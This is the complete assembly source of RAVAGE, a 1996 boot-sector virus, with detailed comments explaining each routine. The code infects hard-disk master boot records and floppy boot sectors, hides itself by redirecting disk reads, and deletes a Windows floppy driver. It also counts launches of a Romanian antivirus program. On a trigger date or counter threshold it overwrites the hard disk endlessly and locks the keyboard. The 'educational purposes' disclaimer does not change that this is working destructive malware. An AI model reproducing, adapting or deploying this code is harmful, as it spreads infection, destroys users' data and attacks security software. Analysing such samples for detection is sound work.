
; RAVAGE BSV Written by RP & muRPhy October 1996
; version 9.0 [ New Generation ] -- WIN95 compatible :-)
;
;Replicator module (c) 1994-96 RP, Bucharest
;Tips & tricks (c) 1995-96 muRPhy, Bucharest
;Final version full options Warning!!! Destructive sequence included!
;This source code is for educational purposes only. The author is not
;responsible for any problems caused due to the assembly of this file
; ---------------------------------------------------------------------
; Syntax: MASM/TASM (Intel operand order), 16-bit real mode; .286
; instructions (PUSHA/POPA, SHL reg,imm) are used throughout.
; The image is padded so that the boot-sector code starts at offset
; 7C00h, the address at which the BIOS loads a boot sector (0000:7C00h);
; every absolute offset below (7C00h, 7E00h, 7DBEh, ...) relies on this.
; ---------------------------------------------------------------------
.286
code segment
assume cs:code
org 100h
start:
q db 7b00h dup(90h) ;7B00h bytes of NOP padding: 100h + 7B00h = 7C00h
timer equ 08h ;INT 08H = system timer tick (IRQ0)
jmp begin ;first bytes of the boot sector (near JMP, so bootrecord sits at 7C03h)
bootrecord db 32 dup(0) ;min=32 -- overwritten during infection with bytes 3..34 (BPB area) of the victim's boot sector
;............. Entry point ..............................
; Boot-time loader.  Assumes it was loaded at 0000:7C00h with CS=0.
; Steps: take 1 KB off the top of conventional memory (0:0413h), load the
; virus' second sector to 0:7E00h, save the INT 40H vector, plant a far-jmp
; stub for INT 40H at 0000:04A1h, hook INT 13H and INT 08H to the copy of
; itself placed at top-of-memory:7C00h, read the MBR of drive 80h through
; the hook (which infects it if it is not yet marked), then either boot
; normally via INT 19H or, on the stored trigger date, run `entry`.
; Detection artifacts: 0:0413h decremented; INT 13H/INT 08H vectors in the
; top-of-memory segment; opcode 0EAh at 0000:04A1h.
begin:
push cs
mov di,414h; steal 1k of RAM
pop ds ;DS = CS (assumed 0 at boot)
mov byte ptr ds:[04a1h],0eah ;place the JMP xxxx:xxxx opcode at 0:04A1h for INT 40H
dec di ;added code for jmp xxxx:xxxx for INT 40H
dec ds:word ptr[di] ;0:0413h (BIOS memory size, KB) -= 1
mov ax,ds:word ptr[di]
shl ax,6 ;only >80186 -- KB -> paragraphs: segment of the stolen 1 KB
sub ax,07c0h ;resident segment chosen so that seg:7C00h is that 1 KB
push ax
push ax
;.......................................................
mov ax,0201h; read the other sector of the virus
push cs
pop es
mov bx,7e00h ;second sector lands right after this one
mov cx,000fh ;cylinder 0, sector 15 -- immediate patched at infection time (cxpar)
cxpar equ this word ;label just past the CX immediate: cxpar-2 addresses it
mov dx,0080h ;head 0, drive 80h -- immediate patched at infection time (dxpar)
dxpar equ this word
int 13h
mov word ptr ds:[offset temp-2],609Ch ;restore the PUSHF/PUSHA bytes (9Ch,60h) at the INT 08H entry,
;which the resident copy patches into a short JMP once DOS is up (see int08)
; mov bx,0100h ;get original INT 40H
mov bh,01 ;bl already 00 from bx=7e00
les ax,[bx] ;ES:AX = vector at 0:0100h (INT 40H, BIOS floppy service)
mov ds:[int40seg],es ;store original INT 40H
mov ds:[int40ofs],ax
;.......................................................
pop ax ;resident segment
mov bx,04a2h ;prepare code at 0:4a1h for jmp xxxx:xxxx
mov [bx],offset int40 ;0:04A2h = offset of the resident INT 40H handler
mov word ptr [bx+02],ax ;0:04A4h = resident segment
mov bx,004ch; get & corrupt int 13h
xchg ds:[bx+2],ax ;INT 13H segment := resident segment; AX = original segment
mov ds:[int13seg],ax
mov ax,offset int13
xchg ds:[bx],ax
mov ds:[int13ofs],ax
;.......................................................
pop es ;ES = resident segment
mov si,7c00h; transfer virus code
mov di,si
cld
xor cx,cx
mov ch,02 ;anti TBAV flag O -- CX=0200h words = 1 KB (both sectors)
rep movsw ;copy 0:7C00h..0:7FFFh to resident:7C00h
cli ;no matching STI in this routine
mov ax,es ;get & corrupt INT 08H
; mov bx,timer*4
mov bl,timer*4 ;bh already 00 from bx=004ch
xchg ds:[bx+2],ax
mov es:[int08seg],ax ;saved into the resident copy, not the boot-sector copy
mov ax,offset int08
xchg ds:[bx],ax
mov es:[int08ofs],ax
mov ax,0201h ; fast boot infector sequence
mov dx,0080h
inc cx ;CX=0 after REP MOVSW -> 0001: cylinder 0, sector 1 (MBR); buffer ES:BX = resident:0020h
int 13h ;through the hooked INT 13H: infects drive 80h unless already marked
call testziuaz ; is it trash day ?
cmp dx,0303h ;DX = month:day (BCD) vs. the trigger date (immediate rewritten at infection time)
ziuaz equ this word
jnz boot
jmp entry ;trigger date reached: destructive payload, never returns
boot:
int 19h ;bootstrap loader: loads the (now stealthed) real boot sector
;------------------- int 40h
; Far-jmp stub to the original INT 40H (BIOS floppy service) handler;
; the vector saved at boot lives in int40ofs:int40seg.
jmpint40:
db 0eah
int40ofs dw 0
int40seg dw 0
;----------------- Corrupted entry in INT 40H
; Resident INT 40H handler, reached through the stub planted at
; 0000:04A1h.  Only a read (AH=02) of cylinder 0, sector 1, head 0 -- a
; floppy boot sector -- is intercepted: it is serviced by the original
; handler (`disketa`) and then handed to `verificare`, which infects the
; floppy or hides an existing infection.  Anything else passes through.
int40:
cmp ah,02h
jnz jmpint40
cmp cx,0001
jnz jmpint40
or dh,dh
jnz jmpint40
call disketa
jmp short verificare
;................. jmp int 13 ............................
; Far-jmp stub to the original INT 13H handler (vector saved at boot;
; also used by callint13).
jmpint13:
db 0eah; jmp xxxx:xxxx
int13ofs dw 0
int13seg dw 0
;...........................................................
; Write requests (AH=03) to a hard disk (DL>=80h) take the same
; boot-sector path as reads (contcmp), so a freshly written MBR is
; re-examined and, if it lacks the marker, infected again.
cmp03:
cmp ah,03
jne jmpint13
cmp dl,80h
jb jmpint13
jmp short contcmp
;...........................................................
; Resident INT 13H handler.  Three cases:
;  1. stealth of the hiding place: reads of cylinder 0, head 0, sectors
;     14 or 15 on a hard disk are redirected to sector 13;
;  2. boot-sector requests (sector 1, head 0) are serviced by the original
;     handler and then inspected at `verificare`;
;  3. everything else goes straight to the original handler.
int13: ; FAR PROCEDURE FOR HANDLING INTERRUPT 13H
cmp ah,02h
jnz cmp03
;---
cmp dl,80h ;on a hard disk?
jb contcmp
or dh,dh ;head 0?
jnz contcmp
cmp cx,000eh ;sectors 14 and 15 are redirected to 13, which is assumed to be zeroed
jz fak ;or to hold whatever else
cmp cx,000fh ;show instead of sectors 14 and 15 , sector 13
jnz contcmp ;sector 13 supposed zeroed or whatever
;not quite good implemented but works anyway
fak:
mov cl,0dh ;CL = 13
jmp jmpint13
;---
contcmp:
cmp cx,0001
jnz jmpint13
or dh,dh; <=> cmp dh,00
jnz jmpint13
cmp dl,80h
jae hard
call disketa ;floppy: service the request through the original INT 40H
jmp short verificare
hard:
call callint13; it was requested a read action for the boot
; After the real service: ES:BX is the caller's buffer, CF its status.
; Offset 1BCh of an infected sector holds the marker word 0202h (virsign).
verificare:
jc giveup
cmp es:word ptr[bx+1bch],0202h; is it infected?
jz showboot
call compute ;CX/DH := hiding place for the original boot sector
mov ax,0301h; write real boot on computed sector
call callint13
jnc continue ;then write the virus itself (see `continue`)
clearerr:
clc
; Return from the interrupt: RETF 2 discards the flags image pushed by
; INT, so the caller sees CF exactly as it is now.
giveup:
retf 0002
; Already infected: replace the caller's buffer with the original boot
; sector read back from the hiding place (stealth).
showboot:
call compute
mov ax,0201h
call callint13
jmp short giveup
;-------------------------
; Infection of the sector just serviced (reached from verificare after the
; original boot sector was written to the hiding place).  Only the INT
; frame is on the stack here; ES:BX = caller's buffer, CX/DX = request
; (cylinder 0, sector 1, head 0, drive DL).
; Writes the virus' second sector to sector 2, copies the victim's
; partition table and BPB into the virus image, and writes the image over
; sector 1.  On a hard disk it also stuffs 'Y' into the keyboard buffer,
; resets the CMOS counter, bumps `counter` and rewrites the trigger date.
continue:
push es
push bx
push cs
pop es
mov ax,0301h; write the other sector of the virus
inc cx ;sector 2 of the same track
mov cs:[offset cxpar-2],cx ;patch the loader's INT 13H immediates so the
mov cs:[offset dxpar-2],dx ;next boot reads the second sector from here
mov bx,7e00h
call callint13
pop bx
pop es
jc clearerr
push es
push bx
push ds
push si
push di
push es
pop ds ;DS:SI = victim boot sector (caller's buffer)
push cs
pop es ;ES:DI = virus image in the resident segment
mov si,bx
add si,1beh; copy the partition into the virus code
mov di,7dbeh ;-> partition1 area of the image
mov cl,21h ;CH=0 here, so CX=33 words: 64-byte partition table + 55AAh
cld
rep movsw
mov si,bx; copy the boot record into the virus code
add si,3
mov di,7c03h ;bytes 3..34 (BPB area) -> bootrecord
mov cl,16
rep movsw
cmp dl,80h
jb normal
;----- hard disk only
pusha
mov ah,05; bypass BIOS protection;place Y into keyboard buffer.
mov cl,59h ;'Y' with scan code CH=0 -- meant to answer a BIOS boot-sector write prompt
int 16h
call resetcmosflag ;CMOS byte 01h := 100 (the RAV launch counter read by int21)
inc cs:word ptr [counter] ;hard-disk infection count, resident image only
call testziuaz ;DH = month, DL = day (BCD, day clamped to 28)
mov al,dh
cmp al,09h
ja maimare ;"maimare " means "greater than"
add al,12h ;in Romanian language, of course...
daa
maimare:
sub al,09h
das ;BCD month + 3 modulo 12 (e.g. 03h -> 06h, 10h -> 01h)
mov dh,al
mov cs:word ptr [offset ziuaz-2],dx ;new trigger date, compared at every boot
popa
;-----
normal:
inc cx ;CX=0000 after REP MOVSW (preserved by PUSHA/POPA) -> 0001: cylinder 0, sector 1
iar:
mov ax,0301h; write the virus onto the disk
mov bx,7c00h ;ES:BX = resident:7C00h, first sector of the image
xor dh,dh
call callint13
jc iar ;retried until it succeeds -- no upper bound
call resetkeyboard ;discard the 'Y' stuffed above (hard disk only)
afar:
pop di
pop si
pop ds
pop bx
pop es
jmp giveup
; Call the original INT 40H (BIOS floppy) handler as if by INT:
; PUSHF + far CALL through the vector saved at boot.
disketa:
pushf
call cs:dword ptr [int40ofs]
ret
counter dw 0 ;number of hard-disk infections (resident image only)
virsign dw 0202h ;marker at offset 1BCh of the sector; "already infected" test in verificare
partition1 db 80h,01h,01,00,06,0eh,201,231,11h,0,0,0,07,228,03,00 ;partition table at 7DBEh, replaced by the victim's at infection time
;take care (this is my partition)
;you'll have to change this with yours
db 30h dup (0) ;remaining three partition entries
db 55h,0aah ;boot signature; end of the first sector (7E00h)
;............ Second sector ..............................
; Resident INT 2FH handler.  Reacts to the Windows broadcasts:
;  AX=1605h (Windows starting): restores the original INT 13H vector at
;    0:07B4h and 0:0806h, then finds the Windows directory through the
;    "winbootdir=" string of the active PSP's environment, changes to it
;    and deletes system\iosubsys\hsflop.pdr (the protected-mode floppy
;    driver), so Windows keeps using BIOS INT 13H; this path then falls
;    through into cont2f with AX clobbered by the DOS calls.
;  AX=1606h (Windows exiting): re-hooks INT 13H at the same two slots and,
;    if the flag byte 0:04A6h is 0DAh (set by int21), jumps to `entry`.
; NOTE(review): 0:07B4h and 0:0806h are not the IVT slot of INT 13H
; (0:004Ch); what DOS/Win95 keeps there is not established by this file.
; Detection: hsflop.pdr missing; INT 2FH vector in the top-of-memory segment.
int2f: ;FAR PROCEDURE FOR HANDLING INTERRUPT 2FH
pushf
pusha
push ds
push es
xor bx,bx
mov ds,bx ;DS = 0
mov bx,07b4h
cmp ax,1605h ;is it Init Windows ?
jne cont2f
mov ax,cs:[int13ofs] ;restore original handler of INT 13H
mov ds:[bx],ax ;0:07B4h
mov ds:[bx+0806h-07b4h],ax ;0:0806h
mov ax,cs:[int13seg]
mov ds:[bx+2],ax
mov ds:[bx+2+0806h-07b4h],ax
mov ah,62h ;Get Active PSP segment
int 21h ;BX = PSP
mov ds,bx
mov ax,ds:[002ch] ;Get environment segment
mov es,ax
xor di,di
cld
mov cx,0050h ;look at the first 50h bytes of the environment only
mov al,'o'
repnz scasb
cmp es:[di],'to' ; winbootdir? -- the bytes "ot" follow the first 'o' of "winbootdir="
jnz jmpint2f
add di,+06 ;skip "otdir=": DI -> drive letter of the Windows path
push es
pop ds
mov dl,ds:[di]
sub dl,'C'-2 ;letter - 'A' = 0-based drive number
mov ah,0eh ;Select Disk
int 21h
push di
pop dx ;DS:DX = "X:\<windir>" string from the environment
mov ah,3bh ;Change Directory to folder of WIN95
int 21h ;
; a Windows start of the form "win setup.exe" will not work correctly
; after this
;
;I guess if someone'll run something like
;win setup.exe worse things'll happen
;doesn't matter anyway (few of them will
;run win in this way)
push cs
pop ds
mov ah,41h ; Unlink ds:dx -- delete the file named at floppydriver
mov dx,offset floppydriver
int 21h ;ideally this must not fail with AX=1606h, which cont2f would take as the exit broadcast
;here I suppose AX will differ from 1606h
;more than that...I'm sure AX <> 1606h
cont2f:
cmp ax,1606h ;is it Exit Windows?
jne jmpint2f
mov ax,offset int13 ;corrupt again handler of INT 13H
mov ds:[bx],ax
mov ds:[bx+0806h-07b4h],ax
mov ds:[bx+2],cs
mov ds:[bx+2+0806h-07b4h],cs
cmp byte ptr ds:[04a6h],0DAH ;is flag set ? (0DAh is written by int21 when the RAV counter reaches 126 under Windows)
jz entry ;destructive payload, never returns
jmpint2f:
pop es
pop ds
popa
popf
db 0eah; jmp xxxx:xxxx -- to the original INT 2FH handler
int2fofs dw 0
int2fseg dw 0
;----------------------------------
; Destructive payload.  Reached from the loader on the trigger date, from
; int21 when the RAV counter hits 126 outside Windows, and from int2f on
; Windows exit when the 0:04A6h flag is set.  It never returns.
; Prints the message stored backwards at `text` (read from txt-1 downwards
; with STD/LODSB until '$') via INT 10H teletype output, then overwrites
; the first hard disk, head 1, 14 sectors per call (AX=030Eh, DX=0180h)
; from cylinder 0 sector 1 onwards, advancing CH and then the high
; cylinder bits in CL, in an endless loop.  Each pass also resets the CMOS
; counter and masks IRQ1 on the master PIC (port 21h, bit 1), so the
; keyboard stops responding.  ES:BX are not set here: what gets written
; is whatever they point at on arrival.
entry:
push cs
pop ds
mov si,offset txt-1 ;last byte of the reversed message
video:
mov ax,0010h ;set video mode 10h
int 10h
mov ah,0eh ;teletype output
mov bl,0ah ;foreground colour (graphics mode)
repeta:
std
lodsb ;walk the string backwards
cmp al,'$'
jz distroi
int 10h
jmp short repeta
distroi:
mov cx,0001h ;cylinder 0, sector 1
destroyagain:
mov ax,030eh ;write 14 sectors
mov dx,0180h ;head 1, drive 80h
call callint13
call resetcmosflag
in al,21h ;disable keyboard
or al,02 ;mask IRQ1 (keyboard) on the master PIC
out 21h,al
inc ch ;next cylinder
jnz destroyagain ;
add cl,40h ;for all existing cylinders > 256 -- CL bits 6-7 are cylinder bits 8-9
jmp short destroyagain ;no exit
;..........................INT 21H
; Resident INT 21H handler.  Only AH=4Bh (EXEC) is examined: the program
; name at DS:DX is isolated after its last '\' and compared, case-folded
; (AND 0DFh), against "RAV" (the source says: Romanian AntiVirus).
; Each such launch increments a counter kept in CMOS RTC byte 01h (set to
; 100 by resetcmosflag); when it reads 126 the payload is armed: at once
; (`entry`) if Windows is not running (INT 2FH AX=1600h returns AL=0),
; otherwise by setting the flag byte 0:04A6h=0DAh that int2f checks on
; Windows exit.  Detection: INT 21H vector in the top-of-memory segment;
; CMOS byte 01h holding 100..126.
int21:
pushf
pusha
push ds
push es
mov di,dx ;DS:DI = program name (ASCIIZ)
xor ah,4bh ;ZF only for AH=4Bh (EXEC)
jnz oldint21
push ds
pop es
xor al,al
cld
mov cl,0ffh ;CH is left as the caller had it
repnz scasb ;forward: DI -> just past the terminating 0
std
mov al,'\'
repnz scasb ;backward: DI -> byte before the last '\' (DI+2 = first char of the name)
mov ax,ds:[di+02]
and ax,0dfdfh ;fold to upper case
cmp ax,'AR' ;bytes "RA" in memory
jnz oldint21
mov ah,ds:[di+04]
and ah,0dfh
cmp ah,'V'
jnz oldint21
mov al,01
out 70h,al ;CMOS index 01h
in al,71h
cmp al,126 ;max value for counter
jne ravnormal
mov ax,1600h ;checking Win active
int 2fh
or al,al
jz entry ;al=0 means Win not active -- payload now, never returns
xor ax,ax
mov ds,ax
mov byte ptr ds:[04a6h],0DAh ;set flag on low memory -- int2f fires the payload on Windows exit
jmp short oldint21
;------------------------
ravnormal:
inc ax ;AL = counter + 1 (only AL matters below)
push ax
mov al,01
out 70h,al
pop ax
out 71h,al ;write the counter back to CMOS byte 01h
oldint21:
pop es
pop ds
popa
popf
db 0eah; JMP xxxx:xxxx -- to the original INT 21H handler
int21ofs dw 0
int21seg dw 0
;............... INT 08H .......................................
; Resident timer-tick handler, live only until DOS is up.  On every tick
; it scans memory upwards from 0B8Ah:0000 for the bytes "PEC=" (the tail
; of "COMSPEC=", i.e. COMMAND.COM's environment exists).  Once found it
; hooks INT 2FH and INT 21H to the resident handlers, puts 0:0413h back
; to its original value (presumably because DOS has already sized memory
; by then), points the INT 40H vector (0:0100h) at the far-jmp stub
; planted at 0000:04A1h, and finally patches its own first two bytes
; (PUSHF/PUSHA, at temp-2) into a short JMP to `peste`, so later ticks go
; straight to the original handler.  The loader restores those two bytes
; (609Ch) before the image is copied to its resident segment.
int08:
pushf
pusha
temp equ this word ;the two bytes before this label are the patch target
push es
push ds
xor di,di ;DI=0000h
mov ds,di ;DS=0000h
mov ax,0b8ah
mov es,ax ;ES:DI = 0B8Ah:0000, start of the scan
cld
mov ax,'EP' ;bytes "PE" in memory
mov cx,0ffffh ;"cautare" means "searching"
;for those of you who don't speak
; Romanian language ;-)
cautare:
repnz scasw
or cx,cx
jz notyet ;not found: try again on the next tick
cmp es:[di],'=C' ;next word must be "C=" -> "PEC="
jnz cautare
push cs
pop ax ; ax =residseg
mov di,02fh*4 ;Save segment INT 2Fh
xchg [di+02],ax ;Corrupt segment 2FH
mov cs:[int2fseg],ax
mov ax,offset int2f ;Save & corrupt offset INT 2FH
xchg [di],ax
mov cs:[int2fofs],ax
push cs
pop ax
mov di,021h*4 ;Save segment INT 21h
xchg [di+02],ax ;Corrupt segment 21H
mov cs:[int21seg],ax
mov ax,offset int21 ;Save & corrupt offset INT 21H
xchg [di],ax
mov cs:[int21ofs],ax
;COMMAND.COM is loaded ("Command.com alocat")
inc word ptr ds:[0413h] ;restore 0:0413h (BIOS memory size) decremented at boot
;restoring 0:413h
mov bx,0100h
mov word ptr ds:[bx],04a1h ;corrupt INT 40 to point 0:04a1h
mov word ptr ds:[bx+02],0 ;to a jmp far code
mov word ptr cs:[offset temp-2],[(offset peste)-(offset temp)] shl 8+ 0ebh ;0EBh = JMP SHORT, displacement = peste - temp
; deactivate this routine: later INT 08H ticks jump straight to `peste`
; disabling (handler) routine for INT 08H
notyet:
pop ds
pop es
popa
popf
peste equ this word
db 0eah ;jmp xxxx:xxxx to the original INT 08H handler
int08ofs dw 0
int08seg dw 0
floppydriver db 'system\iosubsys\hsflop.pdr',0 ;path (relative to the Windows directory) deleted by int2f
; DX := today's date from the RTC (INT 1AH AH=04: DH = month, DL = day,
; BCD), with the day clamped to 28h so that a trigger date exists in every
; month.  Clobbers AH, CX, flags.  ("ziua" = day.)
testziuaz:
mov ah,04
int 1ah
cmp dl,28h
jbe nochange
mov dl,28h
nochange:
ret
; Call the original INT 13H handler as if by INT (PUSHF + far CALL through
; the vector saved at boot); CF and registers come back as the BIOS left them.
callint13:
pushf
call cs:dword ptr[int13ofs]
ret
; CMOS RTC byte 01h (the seconds-alarm register, used here as a counter)
; := 100.  int21 increments it on every RAV launch and arms the payload
; at 126.  Clobbers AL.
resetcmosflag:
mov al,01
out 70h,al
mov al,100 ;set counter in CMOS for RAV
out 71h,al ; RAV stands for Romanian AntiVirus
ret ;an AV prog from ROMANIA
; Hiding place for the original boot sector.
; In:  DL = drive, ES:BX = the boot sector.
; Out: CL = sector, DH = head (CH untouched); clobbers AL, flags.
;   hard disk            -> CL=14, DH unchanged (callers arrive with DH=0)
;   floppy, media F0h    -> head 1, sector 14 (1.44 MB)
;   floppy, other media  -> head 1, sector 3
; Offset 15h of the boot sector is the BPB media descriptor byte.
compute:
mov cl,14
cmp dl,80h
jae back
mov dh,1
mov al,es:byte ptr[bx+15h]
cmp al,240; f0h 1.44 disk
je back
mov cl,3
back:
ret
; Hard disk only (DL>=80h): empty the BIOS keyboard buffer by resetting
; its head and tail pointers (0:041Ah, 0:041Ch) to 1Eh, discarding the 'Y'
; stuffed during infection.  On that path BX and DS are clobbered (DS=0).
resetkeyboard:
cmp dl,80h
jb nu
xor bx,bx
mov ds,bx
mov bl,1eh
mov ds:[041ah],bx
mov ds:[041ch],bx
nu:
ret
; '$RAVage is wiping data! RP&muRPhy '
; Stored reversed; `entry` reads it from txt-1 downwards and stops at '$'.
text db '$yhPRum&PR !atad gnipiw si egaVAR'
txt equ this word
code ends
end start
muRPhy (c)96